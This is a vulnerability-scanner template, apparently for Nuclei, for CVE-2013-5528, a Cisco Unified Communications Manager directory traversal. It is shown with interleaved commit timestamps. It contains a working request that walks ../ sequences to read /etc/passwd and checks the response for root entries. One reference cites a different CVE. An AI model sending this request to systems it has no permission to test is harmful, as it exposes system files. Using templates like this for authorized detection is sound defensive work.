2021-07-22 23:12:07 +00:00
id : CVE-2013-5528
info :
name : Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author : daffainfo
2023-07-11 19:49:27 +00:00
severity : medium
2022-02-25 14:32:23 +00:00
description : A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
2022-02-25 14:32:23 +00:00
reference :
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
2022-05-17 09:18:12 +00:00
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
2022-02-25 14:32:23 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 4
2022-02-25 14:32:23 +00:00
cve-id : CVE-2013-5528
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2024-01-14 13:49:27 +00:00
epss-score : 0.00534
epss-percentile : 0.74648
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : cisco
product : unified_communications_manager
2024-01-14 09:21:50 +00:00
tags : cve2013,cve,lfi,cisco,edb
2021-07-22 23:12:07 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 23:12:07 +00:00
- method : GET
path :
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-22 23:12:07 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a004730450221009216a0873a4631bdf979896a69420889ba629fb7c39639e7c7fd81a8d74b87bc022026df56eacf8dc41df4fa242afb7662bca3c84e04ae665fe623772ad89022acf8:922c64590222798bb761d5b6d8e72950